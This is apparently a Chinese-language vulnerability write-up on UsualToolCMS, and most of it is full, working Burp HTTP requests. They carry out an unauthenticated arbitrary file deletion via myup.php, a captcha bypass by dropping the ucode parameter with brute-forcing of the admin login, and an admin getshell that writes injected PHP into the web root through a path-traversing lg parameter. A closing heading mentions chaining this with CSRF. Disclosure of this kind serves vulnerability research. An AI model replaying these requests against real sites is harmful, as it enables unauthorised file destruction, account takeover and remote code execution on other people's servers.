0x01 第一处:前台任意文件删除

漏洞信息:前台myup.php文件最后一段存在任意文件删除 代码:

漏洞点:http://xxx/myup.php

1

第47行只对..做了过滤,我仍然能任意删除网站内的文件,直接构造poc,

2

3

Burp POC:

4

POST /UsualToolCMS/myup.php HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

get=delimg&imgurl=./1.php

0x02 绕过后台验证码爆破

漏洞点:http://xxx.xxx.xxx.xxx/cmsadmin/ 后台登陆时默认需要输入验证码,但是当我把验证码的参数ucode删除时,登陆依然成功

1.默认情况下登陆数据包

2-1

2-2

删除ucode参数和cookie后登陆,直接登陆成功

2-3

通过burp爆破后台密码

2-4

2-5

POST /UsualToolCMS/cmsadmin/a_login.php?do=login HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.235.242/UsualToolCMS/cmsadmin/a_login.php
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

uuser=admin&upass=admin

0x03 后台GETSHELL

漏洞点:http://xxx.xxx.xxx.xxx/cmsadmin/a_lang.php 13行未对$lg做判断

3-1

3-2

3-3

点击保存时抓包需要修改url处的lg参数这样就上传到跟目录了,再在post 参数的en后面加入en"},<?php phpinfo(); ?>

3-4

3-5

3-6

POST /UsualToolCMS/cmsadmin/a_langx.php?x=m&lg=../1.php HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.235.242/UsualToolCMS/cmsadmin/a_langx.php?lg=lg-en.json
Cookie: navleft=21; UTCMSLanguage=zh; PHPSESSID=1r5kk3jieflfbnseav3e5dnclo
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 9189

submit=%E4%BF%9D%E5%AD%98%E8%AF%AD%E8%A8%80%E5%8C%85&keys%5B%5D=language&values%5B%5D=en"},<?php phpinfo(); ?>&keys%5B%5D=charset&values%5B%5D=utf-8&keys%5B%5D=speak&values%5B%5D=English&keys%5B%5D=web&values%5B%5D=UsualToolCMS&key%5B%5D=index&value%5B%5D=Home&key%5B%5D=article&value%5B%5D=Article&key%5B%5D=product&value%5B%5D=Product&key%5B%5D=picture&value%5B%5D=Picture&key%5B%5D=atlas&value%5B%5D=Atlas&key%5B%5D=contact&value%5B%5D=Contact&key%5B%5D=about&value%5B%5D=About&key%5B%5D=forum&value%5B%5D=Forum&key%5B%5D=register&value%5B%5D=Register&key%5B%5D=login&value%5B%5D=Login&key%5B%5D=news&value%5B%5D=News&key%5B%5D=job&value%5B%5D=Job&key%5B%5D=wages&value%5B%5D=Wages&key%5B%5D=application&value%5B%5D=Application&key%5B%5D=resume&value%5B%5D=Resume&key%5B%5D=shopcart&value%5B%5D=Shopcart&key%5B%5D=account&value%5B%5D=Account&key%5B%5D=member&value%5B%5D=Member&key%5B%5D=up&value%5B%5D=Up&key%5B%5D=down&value%5B%5D=Down&key%5B%5D=more&value%5B%5D=More&key%5B%5D=new&value%5B%5D=New&key%5B%5D=authorize&value%5B%5D=Authorize&key%5B%5D=authenticating&value%5B%5D=Authenticating&key%5B%5D=qq&value%5B%5D=QQ&key%5B%5D=membercenter&value%5B%5D=Member&key%5B%5D=username&value%5B%5D=Username&key%5B%5D=password&value%5B%5D=Password&key%5B%5D=forgotpass&value%5B%5D=Forgot&key%5B%5D=search&value%5B%5D=Search&key%5B%5D=detail&value%5B%5D=Detail&key%5B%5D=size&value%5B%5D=Size&key%5B%5D=spec&value%5B%5D=Spec&key%5B%5D=color&value%5B%5D=Color&key%5B%5D=aboutus&value%5B%5D=About+Us&key%5B%5D=newgoods&value%5B%5D=New+Product&key%5B%5D=topgoods&value%5B%5D=Top+Product&key%5B%5D=link&value%5B%5D=Link&key%5B%5D=confirm&value%5B%5D=Confirm&key%5B%5D=email&value%5B%5D=Email&key%5B%5D=title&value%5B%5D=Title&key%5B%5D=content&value%5B%5D=Content&key%5B%5D=avatar&value%5B%5D=Avatar&key%5B%5D=sex&value%5B%5D=Sex&key%5B%5D=man&value%5B%5D=Man&key%5B%5D=woman&value%5B%5D=Woman&key%5B%5D=address&value%5B%5D=ADD.&key%5B%5D=tel&value%5B%5D=Tel&key%5B%5D=fax&value%5B%5D=Fax&key%5B%5D=introduction&value%5B%5D=Intro&key%5B%5D=validatecode&value%5B%5D=Captcha&key%5B%5D=changeit&value%5B%5D=Change+it&key%5B%5D=order&value%5B%5D=Order&key%5B%5D=writeorder&value%5B%5D=Write+Order&key%5B%5D=menu&value%5B%5D=Menu&key%5B%5D=balance&value%5B%5D=Balance&key%5B%5D=level&value%5B%5D=Level&key%5B%5D=writearticles&value%5B%5D=Write+Articles&key%5B%5D=articlemanagement&value%5B%5D=Article+Admin&key%5B%5D=articlebrowse&value%5B%5D=Article+Browse&key%5B%5D=writeonline&value%5B%5D=Add+New&key%5B%5D=payment&value%5B%5D=Payment&key%5B%5D=registrationtime&value%5B%5D=Reg+Time&key%5B%5D=lastlogintime&value%5B%5D=Last+Login&key%5B%5D=fullname&value%5B%5D=Full+Name&key%5B%5D=privileges%3Adiscount&value%5B%5D=Privileges%3ADiscount&key%5B%5D=state&value%5B%5D=State&key%5B%5D=source&value%5B%5D=Source&key%5B%5D=ordernumber&value%5B%5D=Order+No.&key%5B%5D=money&value%5B%5D=Money&key%5B%5D=time&value%5B%5D=Time&key%5B%5D=finish&value%5B%5D=Finish&key%5B%5D=unpaid&value%5B%5D=Unpaid&key%5B%5D=deliver&value%5B%5D=Deliver&key%5B%5D=refund&value%5B%5D=Refund&key%5B%5D=goods&value%5B%5D=Goods&key%5B%5D=charge&value%5B%5D=Charge&key%5B%5D=other&value%5B%5D=Other&key%5B%5D=ordertime&value%5B%5D=Order+Time&key%5B%5D=voucher&value%5B%5D=Voucher&key%5B%5D=customer&value%5B%5D=Customer&key%5B%5D=zipcode&value%5B%5D=Zip+Code&key%5B%5D=logistics&value%5B%5D=Logistics&key%5B%5D=logisticscompany&value%5B%5D=Company&key%5B%5D=logisticsnumber&value%5B%5D=Number&key%5B%5D=logisticsdetails&value%5B%5D=Details&key%5B%5D=paymentmethod&value%5B%5D=Method&key%5B%5D=alipay&value%5B%5D=Alipay&key%5B%5D=wechatpay&value%5B%5D=Tencent+Wechat&key%5B%5D=paypal&value%5B%5D=Paypal&key%5B%5D=waitinganswer&value%5B%5D=Waiting&key%5B%5D=answered&value%5B%5D=Answered&key%5B%5D=question&value%5B%5D=Question&key%5B%5D=reply&value%5B%5D=Reply&key%5B%5D=tencentaccount&value%5B%5D=Tencent&key%5B%5D=weiboaccount&value%5B%5D=Weibo&key%5B%5D=wechataccount&value%5B%5D=Wechat&key%5B%5D=binded&value%5B%5D=Binded&key%5B%5D=untie&value%5B%5D=Untie&key%5B%5D=quantity&value%5B%5D=Qty&key%5B%5D=parameter&value%5B%5D=Parm&key%5B%5D=total&value%5B%5D=Total&key%5B%5D=submit&value%5B%5D=Submit&key%5B%5D=delete&value%5B%5D=Del&key%5B%5D=unit&value%5B%5D=USD&key%5B%5D=actual&value%5B%5D=Actual&key%5B%5D=feedback&value%5B%5D=Feedback&key%5B%5D=otheraccount&value%5B%5D=Other+Accounts&key%5B%5D=out&value%5B%5D=Out&key%5B%5D=ranking&value%5B%5D=Ranking&key%5B%5D=recommend&value%5B%5D=Recommend&key%5B%5D=tag&value%5B%5D=Tag&key%5B%5D=tags&value%5B%5D=Tags&key%5B%5D=read&value%5B%5D=Read&key%5B%5D=productdetails&value%5B%5D=Product+Details&key%5B%5D=service&value%5B%5D=Service&key%5B%5D=category&value%5B%5D=Category&key%5B%5D=allcategory&value%5B%5D=All+Category&key%5B%5D=stock&value%5B%5D=Stock&key%5B%5D=price&value%5B%5D=Price&key%5B%5D=sale&value%5B%5D=Sale&key%5B%5D=loginview&value%5B%5D=Login+View&key%5B%5D=readme&value%5B%5D=Read+Me&key%5B%5D=popularity&value%5B%5D=Popularity&key%5B%5D=details&value%5B%5D=Details&key%5B%5D=message&value%5B%5D=Message&key%5B%5D=original&value%5B%5D=Original&key%5B%5D=author&value%5B%5D=Author&key%5B%5D=pass&value%5B%5D=Pass&key%5B%5D=audit&value%5B%5D=Audit&key%5B%5D=return&value%5B%5D=Return&key%5B%5D=yes&value%5B%5D=Yes&key%5B%5D=no&value%5B%5D=No&key%5B%5D=modify&value%5B%5D=Modify&key%5B%5D=articlemodify&value%5B%5D=Article+Modify&key%5B%5D=type&value%5B%5D=Type&key%5B%5D=moreupload&value%5B%5D=Up+to+upload&key%5B%5D=success&value%5B%5D=Success&key%5B%5D=fail&value%5B%5D=Fail&key%5B%5D=upload&value%5B%5D=Upload&key%5B%5D=uploadtime&value%5B%5D=Upload+Time&key%5B%5D=contactus&value%5B%5D=Contact+Us&key%5B%5D=previouspage&value%5B%5D=Prev&key%5B%5D=nextpage&value%5B%5D=Next&key%5B%5D=firstpage&value%5B%5D=First&key%5B%5D=lastpage&value%5B%5D=Last&key%5B%5D=totalpage&value%5B%5D=Total&key%5B%5D=currentpage&value%5B%5D=Current&key%5B%5D=buy&value%5B%5D=Buy&key%5B%5D=mailverify&value%5B%5D=Email+validation&key%5B%5D=welcome&value%5B%5D=Welcome&key%5B%5D=close&value%5B%5D=closed&key%5B%5D=findpassword&value%5B%5D=Find+Password&key%5B%5D=contactmanager&value%5B%5D=Contact+Manager&key%5B%5D=orderdetaillogin&value%5B%5D=For+order+details%2Cplease+visit+the+website.&key%5B%5D=enterusername&value%5B%5D=Please+enter+username%21&key%5B%5D=enterpassword&value%5B%5D=Please+enter+password%21&key%5B%5D=enteremail&value%5B%5D=Please+enter+Email%21&key%5B%5D=emailerr&value%5B%5D=Email+error%21&key%5B%5D=entertitle&value%5B%5D=Please+enter+title%21&key%5B%5D=entercontent&value%5B%5D=Please+enter+content%21&key%5B%5D=selecttype&value%5B%5D=Type+must+be+selected%21&key%5B%5D=enterauthor&value%5B%5D=Please+enter+author%21&key%5B%5D=enterpasswords&value%5B%5D=Please+confirm+the+password%21&key%5B%5D=passworderr&value%5B%5D=The+codes+don&key%5B%5D=entercaptcha&value%5B%5D=Please+enter+captcha%21&key%5B%5D=captchaerr&value%5B%5D=Captcha+error%21&key%5B%5D=mailsenderr&value%5B%5D=Mail+not+sent%21&key%5B%5D=mailok&value%5B%5D=Please+check+email%21&key%5B%5D=pleasemailverify&value%5B%5D=Please+check+email+for+verification%21&key%5B%5D=mailverifycode&value%5B%5D=Email+Authentication+Code&key%5B%5D=mailcopylink&value%5B%5D=Please+copy+the+following+link&key%5B%5D=totalnum&value%5B%5D=Total+Num&key%5B%5D=updateok&value%5B%5D=Update+successed%21&key%5B%5D=updateno&value%5B%5D=Failed+to+update%21&key%5B%5D=payok&value%5B%5D=Successful+payment%21&key%5B%5D=payno&value%5B%5D=Payment+Failed%21&key%5B%5D=createempty&value%5B%5D=Required+field+is+empty%21&key%5B%5D=createok&value%5B%5D=Create+successed%21&key%5B%5D=createno&value%5B%5D=Failed+to+create%21&key%5B%5D=gotopay&value%5B%5D=Go+to+pay%21&key%5B%5D=untieok&value%5B%5D=Untie+successed%21&key%5B%5D=untieno&value%5B%5D=Untie+failed%21&key%5B%5D=delok&value%5B%5D=Delete+successed%21&key%5B%5D=delno&value%5B%5D=Delete+failed%21&key%5B%5D=regclose&value%5B%5D=Website+registration+closed%21&key%5B%5D=regmailerr&value%5B%5D=Account+or+email+registered%21&key%5B%5D=loginusererr&value%5B%5D=Account+does+not+exist%21&key%5B%5D=loginpasserr&value%5B%5D=Account+or+password+does+not+match%21&key%5B%5D=administratorreply&value%5B%5D=The+administrator+has+not+responded%2C+please+wait+patiently.&key%5B%5D=noscript&value%5B%5D=Sorry%2C+your+browser+disabled+JavaScript%2C+it+may+not+be+able+to+use+some+of+the+site&key%5B%5D=readmecontent&value%5B%5D=We+guarantee+that+the+outer+packing+of+the+goods+is+in+good+condition+at+the+time+of+shipment.+When+you+receive+the+goods%2C+please+carefully+check+whether+the+invoice+and+the+goods+are+consistent+with+the+delivery+order.+If+you+find+that+the+goods+are+missing+or+damaged%2C+please+contact+our+customer+service+department+on+the+spot+when+the+delivery+personnel+are+still+on+the+scene%3B+If+you+find+that+the+package+is+damaged+or+the+goods+are+damaged+in+transit%2C+please+point+out+and+refuse+to+accept+it+on+the+spot.+After+refusal%2C+please+call+our+customer+service.+If+you+have+signed+for+it+or+someone+else+has+signed+for+it%2C+you+will+be+considered+as+the+packaging%2C+quantity+and+content+of+the+goods.+I+will+not+be+able+to+accept.&key%5B%5D=copyright&value%5B%5D=Copyright&key%5B%5D=cssdisplay&value%5B%5D=none&key%5B%5D=test&value%5B%5D=Test

##CSRF配合上面的后台getshell

4-1

4-2